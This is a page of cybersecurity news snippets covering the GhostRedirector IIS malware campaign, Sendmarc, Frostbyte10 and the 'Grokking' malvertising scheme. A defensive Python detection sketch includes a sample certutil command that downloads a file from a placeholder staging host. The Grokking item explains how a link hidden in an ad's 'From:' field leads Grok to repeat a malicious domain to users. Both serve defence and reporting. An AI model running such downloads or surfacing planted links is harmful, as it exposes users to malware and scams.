The threat actor known as NoisyBear has launched a sophisticated cyber-espionage effort called Operation BarrelFire, using specially designed phishing lures that imitate internal correspondence to target Kazakhstan’s energy sector, particularly workers of the state oil and gas major KazMunaiGas. Security researchers at Seqrite Labs first observed the campaign in April 2025 and noted its rapid […]
ESET security researchers have uncovered a sophisticated cyber threat campaign targeting Windows servers across multiple countries, with attackers deploying custom malware tools designed for both remote access and search engine manipulation. Cybersecurity experts at ESET have identified a previously unknown threat group dubbed GhostRedirector, which has successfully compromised at least 65 Windows servers primarily located in […]
Wilmington, United States, September 4th, 2025, CyberNewsWire: Veteran email security leader to expand MSP and VAR partnerships and accelerate DMARC adoption.
Sendmarc today announced the appointment of Rob Bowker as North American Region Lead.
Bowker will oversee regional expansion with a focus on growing the Managed Service Provider (MSP) partner community, developing strategic Value-Added Reseller (VAR) partnerships, and broadening the enterprise customer base.
Bowker brings more than two decades of experience in email infrastructure, deliverability, and security.
He has helped organizations implement and scale Domain-based Message Authentication, Reporting and Conformance (DMARC), Sender Policy Framework (SPF), and DomainKeys Identified Mail (DKIM) to protect email ecosystems and improve deliverability.
In his new role, Bowker will lead Sendmarc’s North American growth by forging partner-led routes to market and accelerating DMARC adoption across enterprise and mid-market organizations, while empowering MSPs with tools to protect small and medium-sized businesses (SMBs).
He will also expand the regional team to execute the company’s partner-first strategy.
“What excites me most about Sendmarc is our ability to pair an enterprise-class platform with a globally distributed team of experts. Customers don’t just get the best DMARC platform – they get support that spans time zones, cultures, and perspectives. I’m looking forward to helping Sendmarc accelerate growth across North America, working alongside MSPs, resellers, and enterprises to strengthen email security where it’s needed most,” said Bowker.
“Rob’s knowledge of the email and DMARC landscape and his ability to turn strategy into execution make him an invaluable leader for our North American operations,” said Jason Roos, Chief Sales Officer at Sendmarc.
“We’re excited to see the impact he’ll make as he continues building strong relationships with our partners and customers.”
About Sendmarc
Sendmarc is a global leader in safeguarding email communications through DMARC. Built with a partner-first approach, its platform empowers MSPs and VARs to deliver trusted protection against impersonation, phishing, and other email-based threats.
In addition to preventing fraud, Sendmarc improves email deliverability, ensuring legitimate business communications reach their intended recipients.
Trusted by partners worldwide, Sendmarc provides the tools and expertise needed to help customers achieve full DMARC compliance quickly and effectively.
A newly identified hacking group, dubbed “GhostRedirector” by cybersecurity researchers, has compromised at least 65 Windows servers across the globe, deploying custom malware designed to manipulate search engine results for financial gain.
According to a new report from ESET, the threat actor utilizes a malicious module for Microsoft’s Internet Information Services (IIS) to conduct a sophisticated SEO fraud scheme, primarily benefiting gambling websites.
The attacks, which have been active since at least August 2024, employ two previously undocumented custom tools: a passive C++ backdoor named “Rungan” and a malicious native IIS module called “Gamshen.”
While Rungan provides the attackers with the ability to execute commands on a compromised server, Gamshen is the core of the operation, designed to provide “SEO fraud as-a-service.”
GhostRedirector Hacks Windows Servers
Researchers explain that Gamshen functions by intercepting web traffic on the infected server. The module is specifically configured to activate only when it detects a request from Google’s web crawler, Googlebot.
For regular visitors, the website functions normally. However, when Googlebot scans the site, Gamshen modifies the server’s response, injecting data from its own command-and-control server.
This technique allows the attackers to create artificial backlinks and use other manipulative SEO tactics, effectively hijacking the compromised website’s reputation to boost the page ranking of a target website.
ESET believes the primary beneficiaries of this scheme are various gambling websites targeting Portuguese-speaking users. ESET researchers have attributed the campaign with medium confidence to a previously unknown, China-aligned threat actor.
This assessment is based on several factors, including the use of a code-signing certificate issued to a Chinese company, hardcoded Chinese language strings within the malware samples, and a password containing the Chinese word “huang” (yellow) used for rogue user accounts.
The victimology indicates an opportunistic approach rather than a targeted campaign against a specific industry.
Compromised servers span sectors such as healthcare, retail, transportation, education, and technology, with the majority located in Brazil, Thailand, and Vietnam.
Additional victims were identified in the United States, Peru, Canada, and parts of Europe and Asia.
GhostRedirector’s attack chain begins with what is believed to be an SQL injection vulnerability for initial access. Once inside, the attackers use PowerShell or CertUtil to download their arsenal from a staging server.
To gain full control, they employ publicly known privilege escalation exploits like “EfsPotato” and “BadPotato” to create new administrator-level user accounts on the server.
These rogue accounts provide persistent access, ensuring the attackers can maintain control even if their primary backdoors are discovered and removed.
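The chain described above leaves two traces a defender can correlate in the Windows Security log: a CertUtil or PowerShell download, and a new local account promoted to Administrators shortly afterwards. The following is an added detection sketch, not taken from the ESET report; the events, host names, account names and command line are constructed, and the download keywords are assumed common forms rather than the group's actual commands.

```python
from datetime import datetime, timedelta

ADMINS_SID = "S-1-5-32-544"   # well-known SID of the local Administrators group
DOWNLOAD_HINTS = ("urlcache", "downloadfile", "downloadstring", "invoke-webrequest")

# Constructed sample events, shaped like a JSON export of the Security log.
EVENTS = [
    {"time": "2025-01-10T02:14:05", "host": "WEB01", "id": 4688,
     "NewProcessName": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil -urlcache -split -f http://staging.example/a.bin a.bin"},
    {"time": "2025-01-10T02:16:40", "host": "WEB01", "id": 4720,
     "TargetUserName": "svc_demo", "TargetSid": "S-1-5-21-1-2-3-1105"},
    {"time": "2025-01-10T02:16:41", "host": "WEB01", "id": 4732,
     "TargetSid": ADMINS_SID, "MemberSid": "S-1-5-21-1-2-3-1105"},
    {"time": "2025-01-10T09:00:00", "host": "WEB02", "id": 4720,
     "TargetUserName": "newhire", "TargetSid": "S-1-5-21-9-9-9-1201"},
]

def _ts(event):
    return datetime.fromisoformat(event["time"])

def is_download(event):
    """4688 process creation by certutil/PowerShell whose command line fetches a file."""
    if event["id"] != 4688:
        return False
    image = event["NewProcessName"].lower()
    cmd = event.get("CommandLine", "").lower()
    return (image.endswith(("certutil.exe", "powershell.exe"))
            and any(hint in cmd for hint in DOWNLOAD_HINTS))

def rogue_admin_candidates(events, window=timedelta(minutes=30)):
    """Accounts created (4720) and added to Administrators (4732) within `window`,
    annotated with whether a tool download preceded them on the same host."""
    findings = []
    for created in (e for e in events if e["id"] == 4720):
        host, sid, t0 = created["host"], created["TargetSid"], _ts(created)
        promoted = any(e["id"] == 4732 and e["host"] == host
                       and e["TargetSid"] == ADMINS_SID and e["MemberSid"] == sid
                       and timedelta(0) <= _ts(e) - t0 <= window for e in events)
        if promoted:
            preceded = any(is_download(e) and e["host"] == host
                           and timedelta(0) <= t0 - _ts(e) <= window for e in events)
            findings.append((host, created["TargetUserName"], preceded))
    return findings
```

Event 4688 carries the command line only when the "Include command line in process creation events" audit policy is enabled, so without it the download annotation is always false.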
The group’s toolkit also includes other custom utilities, such as “Zunput,” a tool that scans the server for active websites and drops multiple webshells to provide alternative methods of remote access.
The shared code libraries and infrastructure across these tools allowed ESET to cluster the activity and attribute it to a single group.
While the immediate impact on website visitors is minimal, participation in the SEO fraud scheme can severely damage the compromised host’s reputation by associating it with black-hat SEO tactics.
Armis Labs has uncovered ten critical security flaws collectively named “Frostbyte10” in Copeland’s E2 and E3 building management controllers. These devices, which handle refrigeration, HVAC, lighting, and other essential functions, could allow remote attackers to execute code, change settings, disable systems, or steal sensitive data. A firmware update is available now, and affected organizations are […]
A new cyber-attack, dubbed “Grokking,” is exploiting features on the social media platform X to spread malicious links on a massive scale.
Scammers are manipulating the platform’s advertising system and its generative AI, Grok, to bypass security measures and amplify harmful domains. This technique turns X’s own tools into unwilling accomplices in a widespread malvertising scheme.
According to Guardio Security researcher Nati Tal, the attack begins with malicious promoted “video card” posts, which often use explicit or sensational “adult” content to lure users.
While X’s policies aim to combat malvertising by disallowing links in promoted content, these attackers have found a critical loophole.
The malicious link is not placed in the main body of the post but is instead embedded in the small “From:” field located beneath the video player.
X’s automated security scans seem to miss this area. As a result, posts can spread widely and get anywhere from 100,000 to over 5 million paid impressions.
The second stage of the attack leverages the platform’s AI assistant, Grok. Curious users, seeing the often anonymous and intriguing videos, frequently turn to Grok to ask for the source.
In its effort to provide a helpful answer, the AI scans the post for information and extracts the domain name from the “From:” field.
Grok then presents this malicious link directly to the user in its reply. For instance, when asked about a video’s origin, Grok has been observed responding with links to suspicious domains, Nati Tal said.
This process effectively “Grokks” the malicious link, not only delivering it to inquisitive users but also amplifying its visibility and perceived legitimacy.
By having the platform’s own AI reference the domain, the scammers may benefit from enhanced SEO and a strengthened reputation for their harmful sites, making them seem more trustworthy to unsuspecting users.
Microsoft has officially acknowledged a significant User Account Control (UAC) bug that is causing widespread installation issues across Windows 10 and Windows 11 systems. The problem stems from a security update released in August 2025 and affects millions of users attempting to install or repair applications. The Core Issue The bug emerged following Microsoft’s August 2025 […]
Cybersecurity researchers have flagged a new technique that cybercriminals have adopted to bypass social media platform X’s malvertising protections and propagate malicious links using its artificial intelligence (AI) assistant Grok.
The findings were highlighted by Nati Tal, head of Guardio Labs, in a series of posts on X. The technique has been codenamed Grokking.
The approach is designed to
The French data protection authority has fined Google and Chinese e-commerce giant Shein $379 million (€325 million) and $175 million (€150 million), respectively, for violating cookie rules.
Both companies set advertising cookies on users’ browsers without securing their consent, the National Commission on Informatics and Liberty (CNIL) said. Shein has since updated its systems to comply with